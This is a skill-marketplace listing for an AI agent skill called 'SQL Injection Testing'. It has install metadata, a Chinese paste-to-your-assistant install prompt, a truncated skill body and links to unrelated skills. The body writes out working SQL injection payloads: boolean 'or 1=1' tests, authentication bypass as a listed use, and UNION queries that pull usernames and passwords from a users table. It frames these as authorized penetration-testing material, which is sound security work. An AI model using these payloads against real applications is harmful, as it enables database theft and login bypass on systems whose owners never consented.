Overview
- Skill Key
- brandonwise/sql-injection-testing
- Author
- brandonwise
- Source Repo
- openclaw/skills
- Version
- -
- Source Path
- skills/brandonwise/sql-injection-testing
- Latest Commit SHA
- 811594396bb4c24e7fdfacee4b49f8e9763bd143
Stars
0
Installs
0
Status
ACTIVE
Visibility
PUBLIC
直接复制以下提示词,发送给你的 AI 助手即可完成安装。
请先检查是否已安装 SkillHub 商店,若未安装,请根据 https://skillhub-1388575217.cos.ap-guangzhou.myqcloud.com/install/skillhub.md 安装 SkillHub 商店,然后安装 Sql Injection Testing 技能。 若已安装,则直接安装 Sql Injection Testing 技能。
# SQL Injection Testing Comprehensive SQL injection vulnerability assessment techniques for web applications, covering detection, exploitation, and defense validation. ## Description USE WHEN: - Testing for SQL injection vulnerabilities - Performing authorized penetration tests - Validating input sanitization mechanisms - Bypassing authentication for security testing - Extracting database information (authorized) - Learning SQL injection defense DON'T USE WHEN: - No written authorization for testing - Testing production systems with real user data - Intent is malicious (don't be evil) ⚠️ **LEGAL REQUIREMENT**: Written penetration testing authorization required before use. --- ## Detection Phase ### Injection Point Identification Common injectable parameters: ``` URL params: ?id=1, ?user=admin, ?category=books Form fields: username, password, search, comments Cookies: session_id, user_preference HTTP headers: User-Agent, Referer, X-Forwarded-For ``` ### Basic Vulnerability Tests ```sql -- Single quote test ' -- Double quote test " -- Comment sequences -- # /**/ -- Semicolon for query stacking ; ``` **Watch for:** - Database error messages - HTTP 500 errors - Modified response content/length - Unexpected behavior changes ### Boolean Logic Tests ```sql -- True condition (should return data) page.asp?id=1 or 1=1 page.asp?id=1' or 1=1-- page.asp?id=1" or 1=1-- -- False condition (should return nothing/error) page.asp?id=1 and 1=2 page.asp?id=1' and 1=2-- ``` Compare responses between true/false to confirm injection. --- ## Exploitation Techniques ### UNION-Based Extraction ```sql -- Step 1: Determine column count ORDER BY 1-- ORDER BY 2-- ORDER BY 3-- -- Continue until error occurs -- Step 2: Find displayable columns UNION SELECT NULL,NULL,NULL-- UNION SELECT 'a',NULL,NULL-- UNION SELECT NULL,'a',NULL-- -- Step 3: Extract data UNION SELECT username,password,NULL FROM users-- UNION SELECT table_name,NULL,NULL FROM information_schema.ta...
youmind-openlab
AI skill for OpenClaw & Claude Code — recommend from 10000+ Nano Banana Pro (Gemini) image prompts. Smart search by use case, content remix, sample images.
23blocks-os
AI Agent Orchestrator with Skills System - Give AI Agents superpowers: memory search, code graph queries, agent-to-agent messaging. Manage Claude, Codex or any AI Agent from one dashboard. Move Agents between computers and locations
hashgraph-online
AI agent skills for the Universal Registry - search, chat, and register 72,000+ agents across 14+ protocols. Works with Claude, Codex, Cursor, OpenClaw, and any AI assistant.
rito-w
A cross-platform skills manager for AI IDEs. Search marketplace, download locally, and install to Claude, Cursor, Windsurf, and more with one click.
besoeasy
Battle-tested skill library for AI agents. Save 98% of API costs with ready-to-use code for crypto, PDFs, search, web scraping & more. No trial-and-error, no expensive APIs.
zeropointrepo
YouTube Transcript API skills for AI agents. Get transcripts, search videos, browse channels. Works with OpenClaw, ClawdBot, Claude Code, Cursor, Windsurf.